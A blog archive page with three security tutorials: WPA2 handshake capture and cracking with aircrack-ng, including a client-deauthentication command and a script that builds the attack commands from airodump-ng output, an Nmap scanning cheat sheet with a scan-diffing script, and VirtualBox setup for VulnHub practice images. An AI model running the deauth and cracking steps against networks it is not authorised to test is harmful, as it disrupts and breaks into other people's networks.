Archives September 2020

How to use aircrack-ng for Wi-Fi Recon and Hacking

One of the first attacks new hackers try is cracking Wi-Fi access points. Before you can even consider attacking a Wi-Fi AP you need the MAC address of the target AP (also known as the BSSID), the MAC address of a client connected to it, and the channel the AP is operating on. All of this and more can be gathered with the tools in the aircrack-ng suite. The suite is included by default in every version of Kali, so if you’ve got your real hacker hat on you don’t need to apt-get anything.

The first step is to put your wireless card into monitor mode. In this mode the card passes up every 802.11 frame it hears, not only the frames addressed to it, much like promiscuous mode on a wired card. The aircrack-ng way of doing this is as follows:

root@kali: ~# airmon-ng start wlan0

wlan0 here is the default name of the wireless interface. If the command fails, confirm that the interface actually exists with ifconfig (or iw dev) and that your card’s driver supports monitor mode, since many built-in and USB adapters do not. airmon-ng will also warn about processes such as NetworkManager and wpa_supplicant that can interfere with the capture. Once the card is in monitor mode airmon-ng renames the interface to something like “wlan0mon”; take note of the new name, it is used in every command that follows.

Now that we are hearing every frame flying past our heads it is time to do something with them, and that is where airodump-ng comes into play. airodump-ng captures and displays the key data for every AP it hears beaconing as well as the clients associated with those APs. The command is as follows:

root@kali: ~# airodump-ng wlan0mon

airodump-ng splits the screen into an upper and a lower portion. The upper portion lists the APs it has seen, with the following columns:

  1. BSSID: MAC address of the AP
  2. PWR: signal level reported by the card (closer to 0 is stronger; -1 means the driver does not report it)
  3. Beacons: number of beacon (announcement) frames received from the AP
  4. #Data: number of captured data packets, broadcast included
  5. #/s: number of data packets per second, measured over the last 10 seconds
  6. CH: channel number, taken from the beacon frames
  7. MB: maximum speed the AP supports, e.g. 54 for 802.11g
  8. ENC: encryption in use: OPN (none), WEP, WPA or WPA2
  9. CIPHER: cipher detected: CCMP, TKIP, WEP, WEP40 or WEP104
  10. AUTH: authentication type: PSK (pre-shared key), MGT (802.1X/RADIUS) or OPN
  11. ESSID: the network name (also known as the SSID); a hidden network shows as “<length: N>” until a client reveals the name

The lower portion lists the stations (clients) seen: the BSSID they are associated with in the first column and the client’s own MAC in the STATION column, which is where the client MAC for the deauthentication step comes from. Now that we have all the information needed to attack the AP, on to the crack itself. You will want three terminals, or three tabs in one terminal. In the first, enter a command like the following:

root@kali: ~# airodump-ng -c 10 --bssid 01:02:AA:BB:CC:22 -w capture_output wlan0mon

That command locks the card onto channel 10 (-c 10), keeps only the frames to and from the target AP (--bssid), and writes them to files whose names start with capture_output (-w). airodump-ng appends a run number to the prefix, so the capture ends up in capture_output-01.cap. In the second terminal we use aireplay-ng to deauthenticate a client connected to the AP, which forces it to reassociate. The reason is that we want to capture the WPA/WPA2 four-way handshake the client performs when it reconnects: its EAPOL frames carry the nonces and the MIC that an offline dictionary attack on the pre-shared key is checked against, and without a handshake there is nothing to crack. Rather than wait for a client to connect on its own, we kick one off. This only works if at least one client is actually associated, and it fails against networks with Protected Management Frames (802.11w) enabled, since those reject forged deauthentication frames. The command is as follows:

root@kali: ~# aireplay-ng --deauth 100 -a 01:02:AA:BB:CC:22 -c A0:A2:E1:33:7C:E5 wlan0mon

In the last terminal we run a wordlist against the captured handshake. airodump-ng wrote the capture as capture_output-01.cap; aircrack-ng reads it directly, picks out the handshake belonging to the BSSID given with -b and tries every candidate in the wordlist. Check that airodump-ng shows “WPA handshake: <BSSID>” in its top-right corner before you start, otherwise there is no handshake in the file to crack. This command will do just that:

root@kali: ~# aircrack-ng -w wordlist.dic -b 01:02:AA:BB:CC:22 capture_output-01.cap
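An added example, not part of the aircrack-ng suite or of this post, showing how to pull the BSSID, channel and an associated client out of what airodump-ng already records: when run with -w, airodump-ng also writes <prefix>-01.csv next to the .cap, containing an AP table followed by a station table. The CSV below is constructed to mirror that layout (the MACs and the ESSID “HomeNet” are made up), and the prefix, interface and wordlist names are assumptions. The script picks a target by ESSID, attaches its clients, and builds the three commands above as argv lists; it executes nothing.

```python
"""Extract recon data (BSSID, channel, associated clients) from the CSV that
airodump-ng writes alongside its .cap file and build the three commands from
the post.  Added example, not part of the aircrack-ng suite; the CSV below is
constructed to mirror airodump-ng's layout, not a real capture."""
import csv
import io
import re
from dataclasses import dataclass, field

# Constructed sample of <prefix>-01.csv: an AP table, a blank line, a station table.
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
01:02:AA:BB:CC:22, 2020-09-01 10:00:00, 2020-09-01 10:05:00,  10, 130, WPA2, CCMP, PSK, -45,      120,        0,   0.  0.  0.  0,   7, HomeNet, 
0C:0C:0C:0C:0C:0C, 2020-09-01 10:00:00, 2020-09-01 10:05:00,   6,  54, OPN ,     ,    , -70,       40,        0,   0.  0.  0.  0,   8, CoffeeAP, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
A0:A2:E1:33:7C:E5, 2020-09-01 10:00:10, 2020-09-01 10:05:00, -50,       34, 01:02:AA:BB:CC:22, HomeNet
DE:AD:BE:EF:00:01, 2020-09-01 10:01:00, 2020-09-01 10:04:00, -80,        3, (not associated) , HomeNet,Other
"""

MAC_RE = re.compile(r"^[0-9A-F]{2}(?::[0-9A-F]{2}){5}$", re.I)


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str   # ENC column: OPN, WEP, WPA, WPA2
    cipher: str    # CIPHER column: CCMP, TKIP, WEP ...
    auth: str      # AUTH column: PSK, MGT, OPN
    essid: str
    clients: list = field(default_factory=list)  # STATION MACs associated with this BSSID


def parse_airodump_csv(text):
    """Return {BSSID: AccessPoint} with each AP's associated clients attached.
    Caveat: airodump-ng does not quote the ESSID field, so a network name that
    contains a comma shifts the columns of its row and is not handled here."""
    aps = {}
    section = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not row[0].strip():
            continue
        first = row[0].strip()
        if first == "BSSID":          # header of the AP table
            section = "ap"
            continue
        if first == "Station MAC":    # header of the client table
            section = "sta"
            continue
        if section == "ap" and MAC_RE.match(first) and len(row) >= 14:
            aps[first.upper()] = AccessPoint(
                bssid=first.upper(),
                channel=int(row[3].strip()),
                privacy=row[5].strip(),
                cipher=row[6].strip(),
                auth=row[7].strip(),
                essid=row[13].strip(),
            )
        elif section == "sta" and MAC_RE.match(first) and len(row) >= 6:
            bssid = row[5].strip().upper()
            if bssid in aps:          # "(not associated)" stations have nothing to deauth from
                aps[bssid].clients.append(first.upper())
    return aps


def plan_attack(aps, essid, prefix="capture_output", iface="wlan0mon", wordlist="wordlist.dic"):
    """Pick the AP broadcasting `essid` and return the airodump-ng, aireplay-ng and
    aircrack-ng commands from the post as argv lists (nothing is executed).
    Returns None when there is no such AP, it is an open network (nothing to
    crack) or no client is associated (nothing to deauthenticate)."""
    target = next((ap for ap in aps.values() if ap.essid == essid), None)
    if target is None or target.privacy == "OPN" or not target.clients:
        return None
    capture = ["airodump-ng", "-c", str(target.channel), "--bssid", target.bssid,
               "-w", prefix, iface]
    # a handful of deauth bursts is normally enough; 0 would mean "forever"
    deauth = ["aireplay-ng", "--deauth", "5", "-a", target.bssid,
              "-c", target.clients[0], iface]
    # airodump-ng appends a run number to the -w prefix, hence -01.cap
    crack = ["aircrack-ng", "-w", wordlist, "-b", target.bssid, f"{prefix}-01.cap"]
    return capture, deauth, crack


if __name__ == "__main__":
    for cmd in plan_attack(parse_airodump_csv(SAMPLE_CSV), "HomeNet"):
        print(" ".join(cmd))
```

Building the commands as argv lists rather than one shell string matters here: the ESSID is attacker-controlled text broadcast by a radio, so it should never be pasted into a shell line.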

How to use Nmap like a Hacker

If you’ve spent five minutes looking at anything related to hacking networks you’ve undoubtedly run across the tool Nmap. And if you’ve just copied whatever example you saw it used in, you are missing out on one of the most powerful hacking tools out there. Let’s start at the beginning: Nmap was developed by Gordon Lyon, also known as Fyodor, in 1997. It was created for fun and in the hope that people would find it useful. And Fyodor, if you’re reading this, it really is. The tool comes by default on Kali, but if you are using an OS that doesn’t have it installed already, I’ll go over installation now.

Installing Nmap

Linux RPM Source and Binaries

For RPM-based Linux distributions the following commands install the binaries straight from nmap.org. Note that rpm fetches the package over HTTPS but only verifies its signature if you have imported the signing key, so check the package against the signatures or hashes published on the download site. If these commands don’t work for you, check out the more detailed guide on the nmap site here

rpm -vhU https://nmap.org/dist/nmap-7.80-1.x86_64.rpm
rpm -vhU https://nmap.org/dist/zenmap-7.80-1.noarch.rpm
rpm -vhU https://nmap.org/dist/ncat-7.80-1.x86_64.rpm
rpm -vhU https://nmap.org/dist/nping-0.7.80-1.x86_64.rpm

Mac OS X Binaries

You can get a stable release installer for Mac OS here

Scanning for targets

Before you can start looking at open ports and the services behind them, you have to see which hosts are up to begin with (nmap -sn does host discovery only, without a port scan).

Scan a single IP
root@kali:~# nmap 127.0.0.1

Scan via domain name
root@kali:~# nmap www.target.com

Scan a range of IPs (last octet 1 through 24)
root@kali:~# nmap 127.0.0.1-24

Scan a full subnet
root@kali:~# nmap 127.0.0.1/24

Scan the hosts listed in a text file
root@kali:~# nmap -iL iplist.txt

Exclude a host from the scan (a target list is still required)
root@kali:~# nmap 127.0.0.1/24 --exclude 127.0.0.1

Exclude a list of hosts from the scan
root@kali:~# nmap 127.0.0.1/24 --excludefile ips.txt

OS and Service Detection

Now that we can see what host is up we should take a look at what Nmap can do in helping us determine the operating system and services on those hosts.

Detect OS and services (-A also runs the default scripts and a traceroute)
root@kali:~# nmap -A 127.0.0.1

Standard service detection
root@kali:~# nmap -sV 127.0.0.1

Aggressive detection (intensity 9 sends every probe; the default is 7)
root@kali:~# nmap -sV --version-intensity 9 127.0.0.1

Light banner grabbing (intensity 0 sends only the probes registered for the port)
root@kali:~# nmap -sV --version-intensity 0 127.0.0.1

Scanning for ports

While Nmap has added a dizzying number of functions and features, port scanning is the core of what it does. Nmap recognizes six port states: open, closed, filtered, unfiltered, open|filtered and closed|filtered.

Scan a single port (port 80)
root@kali:~# nmap -p 80 127.0.0.1

Scan a range of ports
root@kali:~# nmap -p 22-80 127.0.0.1

Scan the 100 most common ports (-F; lowercase -f means packet fragmentation, a different thing)
root@kali:~# nmap -F 127.0.0.1

Scan all 65535 ports
root@kali:~# nmap -p- 127.0.0.1

Show open ports only
root@kali:~# nmap --open 127.0.0.1

Port Scanning Techniques

With Nmap you can set the type of scan you would like to do when you set off on a scan hunt. Depending on the kind of scanning you do most often you will use one of the following on almost every scan. But even so, it never hurts to know what other techniques are out there.

TCP SYN scan (the default when run as root; unprivileged users get a connect scan)
root@kali:~# nmap -sS 127.0.0.1

TCP connect scan
root@kali:~# nmap -sT 127.0.0.1

UDP scan
root@kali:~# nmap -sU 127.0.0.1

SCTP INIT scan
root@kali:~# nmap -sY 127.0.0.1

TCP ACK scan
root@kali:~# nmap -sA 127.0.0.1

TCP Window scan
root@kali:~# nmap -sW 127.0.0.1

Outputting Formats

Let’s finish with how you can store what Nmap gives you from these scans. Yes, you could always redirect standard output to a file, but before you do that check out what Nmap can do right out of the box. If you keep only one format, keep the XML: it is the one other tools parse reliably.

Normal output to a file
root@kali:~# nmap -oN file.txt 127.0.0.1

Output to XML
root@kali:~# nmap -oX file.xml 127.0.0.1

Grepable output
root@kali:~# nmap -oG file.txt 127.0.0.1

All three formats at once (writes file.nmap, file.xml and file.gnmap)
root@kali:~# nmap -oA file 127.0.0.1
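An added example, not Nmap’s own code or this post’s, of what the XML output is good for: parsing -oX files and diffing two scans of the same range to find ports that have opened since a baseline, which is the check a defender re-scanning their own network, or a tester returning to a target, actually wants. The two XML documents are constructed in the shape Nmap writes (nmaprun, host, status, address, ports), with made-up addresses and services.

```python
"""Parse nmap -oX output and diff two scans to find newly opened ports.
Added example, not part of nmap; the two XML documents below are constructed
in the shape nmap writes, not real scan output, and the addresses are made up."""
import xml.etree.ElementTree as ET

# Constructed "baseline" scan: 10.0.0.5 has only ssh open, 10.0.0.6 is down.
BASELINE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -oX baseline.xml 10.0.0.0/29" version="7.80">
  <host><status state="up" reason="echo-reply"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="80"><state state="closed" reason="reset"/><service name="http"/></port>
    </ports>
  </host>
  <host><status state="down" reason="no-response"/><address addr="10.0.0.6" addrtype="ipv4"/></host>
</nmaprun>
"""

# Constructed "current" scan: http appeared on 10.0.0.5 and a new host 10.0.0.7 exposes SMB.
CURRENT_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -oX current.xml 10.0.0.0/29" version="7.80">
  <host><status state="up" reason="echo-reply"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="nginx"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered" reason="no-response"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host><status state="up" reason="arp-response"/>
    <address addr="10.0.0.7" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ip: {"tcp/22": (state, service_name), ...}} for every host that is up.
    ElementTree is acceptable here because the XML comes from our own nmap run;
    for XML from an untrusted source use defusedxml instead."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        ports = {}
        for port in host.iter("port"):
            state = port.find("state").get("state")
            service = port.find("service")
            name = service.get("name", "") if service is not None else ""
            ports[f"{port.get('protocol')}/{port.get('portid')}"] = (state, name)
        hosts[addr] = ports
    return hosts


def open_ports(hosts):
    """{ip: sorted "proto/port" list of ports in state open} (open|filtered is not counted)."""
    return {ip: sorted(p for p, (state, _) in ports.items() if state == "open")
            for ip, ports in hosts.items()}


def diff_scans(baseline, current):
    """Ports open in `current` that were not open in `baseline`; a host absent
    from the baseline has all of its open ports reported as new."""
    before, after = open_ports(baseline), open_ports(current)
    changes = {}
    for ip, ports in after.items():
        new = sorted(set(ports) - set(before.get(ip, [])))
        if new:
            changes[ip] = new
    return changes


if __name__ == "__main__":
    for ip, ports in diff_scans(parse_nmap_xml(BASELINE_XML), parse_nmap_xml(CURRENT_XML)).items():
        print(f"{ip}: newly open {', '.join(ports)}")
```

Run the same nmap -oX command on a schedule and feed consecutive files into diff_scans; a port that shows up in the diff is either a change you made or one you need to explain.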

Conclusion

Nmap has far more to it than what is listed here. Full books have been written on the subject, including one from the creator himself, Nmap Network Scanning; these will take your Nmap skills beyond simply running the command examples found on Stack Overflow.

Virtual Machines Explained

TLDR;

Wikipedia defines Virtual Machines as: In computing, a virtual machine (VM) is an emulation of a computer system. Virtual machines are based on computer architectures and provide functionality of a physical computer. Their implementations may involve specialized hardware, software, or a combination. This post will be a Hello World for getting up and running with them.

  • Virtual Machines Explained
  • Images Explained
  • VMs and Linux
  • VMs and Mac
  • VMs and Windows

Virtual Machines Explained

A virtual machine, or VM, is simply a system known as the guest running inside another system known as the host, with software (the hypervisor) holding the boundary between the two. The system running inside the VM is built from something called an image, which I’ll cover in the next section. VMs are useful for a number of reasons, from isolating potentially harmful software from your own system to keeping a copy of a system ready for deployment at any time. For the purposes of this post, and most of the site, I’ll be using VMs to load images to test hacking skills against.

What is an Image

The image is everything when it comes to VMs. It holds the OS, applications, pre-existing files and anything else a normal system has. Think of an image as a snapshot of a system. That makes it ideal for handing identical systems to many people, and a great way to learn, since differences in configuration aren’t a factor. Making your own images is out of scope for this post, but luckily you can pick up tons of ready-made ones from VulnHub. For this post I’m going to get the Mr. Robot image, for no other reason than that I’m a fan of the show. So go ahead and pick one you like, or just follow the link I put for the Mr. Robot image. Then download the .ova (an Open Virtualization Format archive: a tar file holding the OVF descriptor, the disk image and a manifest of file hashes) and, before importing it, check that its hash matches the one published on the download page. You are about to boot someone else’s disk image, so don’t skip that step.
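The hash check above, as an added example that is not VirtualBox, VulnHub or this post’s code: first the whole-file SHA-256 against the value the publisher lists next to the download, then the manifest (.mf) inside the archive, which per the OVF convention records a digest for every file in the package as lines of the form SHA256(file)= hexdigest. The OVA built here is a constructed stand-in with a tiny fake disk, and a second copy with the disk swapped after the manifest was written shows what a tampered package looks like.

```python
"""Verify a downloaded .ova before importing it: against the publisher's
SHA-256, then against the .mf manifest inside the archive.
Added example, not VirtualBox or VulnHub code.  An OVA is a tar archive
holding the .ovf descriptor, the disk image(s) and usually a .mf manifest;
the archive built here is a constructed stand-in, not a real appliance."""
import hashlib
import io
import re
import tarfile

MANIFEST_LINE = re.compile(r"^(SHA1|SHA256|SHA512)\(([^)]+)\)\s*=\s*([0-9a-fA-F]+)$")
SAMPLE_DISK = b"KDMV" + b"\x00" * 64          # stand-in for box-disk1.vmdk


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def _add(tar, name, data):
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))


def build_sample_ova(disk_bytes=SAMPLE_DISK, recorded_disk_bytes=None):
    """Build an in-memory OVA.  The manifest digest is computed over
    `recorded_disk_bytes` (default: the disk actually stored), so passing a
    different value simulates a disk image swapped after the manifest was made."""
    ovf = b'<?xml version="1.0"?><Envelope xmlns="http://schemas.dmtf.org/ovf/envelope/1"/>'
    recorded = disk_bytes if recorded_disk_bytes is None else recorded_disk_bytes
    manifest = (f"SHA256(box.ovf)= {sha256_hex(ovf)}\n"
                f"SHA256(box-disk1.vmdk)= {sha256_hex(recorded)}\n").encode()
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        _add(tar, "box.ovf", ovf)
        _add(tar, "box-disk1.vmdk", disk_bytes)
        _add(tar, "box.mf", manifest)
    return buf.getvalue()


def published_hash_matches(ova_bytes, published_sha256):
    """Step 1: the whole-file hash shown on the download page."""
    return sha256_hex(ova_bytes) == published_sha256.strip().lower()


def verify_ova_manifest(ova_bytes):
    """Step 2: check every file in the OVA against its .mf entry.
    Returns {filename: True/False}; a manifest entry whose file is missing, or
    a file the manifest does not cover at all, is reported as False."""
    with tarfile.open(fileobj=io.BytesIO(ova_bytes), mode="r:*") as tar:
        members = {m.name: tar.extractfile(m).read() for m in tar.getmembers() if m.isfile()}
    mf_name = next((n for n in members if n.endswith(".mf")), None)
    if mf_name is None:
        raise ValueError("no .mf manifest in OVA; only the publisher's hash can be checked")
    results = {}
    for line in members[mf_name].decode("utf-8").splitlines():
        match = MANIFEST_LINE.match(line.strip())
        if not match:
            continue
        algo, name, digest = match.groups()
        data = members.get(name)
        results[name] = (data is not None and
                         hashlib.new(algo.lower(), data).hexdigest() == digest.lower())
    for name in members:
        if name != mf_name and name not in results:
            results[name] = False       # unlisted file: nothing vouches for it
    return results


if __name__ == "__main__":
    ova = build_sample_ova()
    print("publisher hash ok:", published_hash_matches(ova, sha256_hex(ova)))
    print("manifest:", verify_ova_manifest(ova))
```

The two checks answer different questions: the published hash tells you the file is the one the publisher put up, while the manifest tells you the package is internally consistent; a package can pass the second and fail the first if someone republished a modified OVA with a fresh manifest, which is why the published hash is the one that matters against VulnHub’s listing.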

Virtual Machines for Linux

For Linux we are going with VirtualBox as our VM software of choice. You can find the download link here. This is the hardest of the VirtualBox installs simply because the number of Linux distributions is so high. The following are the basics; if you don’t see your flavour of Linux here, or the steps aren’t working for you, check the VirtualBox download page for more details. That page also carries Oracle’s public signing key, which you should add so that apt or yum can verify the packages it installs.

Oracle Linux

Users of Oracle Linux 6 and 7 can install it from the Oracle Linux yum repository:

yum install VirtualBox-6.1

Debian-based Linux distributions

Add the following line to your /etc/apt/sources.list. According to your distribution, replace ‘<mydist>’ with ‘eoan’, ‘bionic’, ‘xenial’, ‘buster’, ‘stretch’, or ‘jessie’ (older versions of VirtualBox supported different distributions):

deb [arch=amd64] https://download.virtualbox.org/virtualbox/debian <mydist> contrib

Then install it:

sudo apt-get update
sudo apt-get install virtualbox-6.1

Once you’ve installed VirtualBox, run it, choose File > Import Appliance and select the .ova you downloaded; that is all there is to it.

Virtual Machine for Windows

Once again we are going with VirtualBox, and here the process is more straightforward than the Linux installation. Download the .exe installer from here, go through the usual next, next, finish clicks, and once the installation is done you are ready to import the .ova and get started.

Virtual Machine for Mac

If you’ve made it this far in the post what I’m going to say next is obvious. Download virtualbox for Mac on the download page.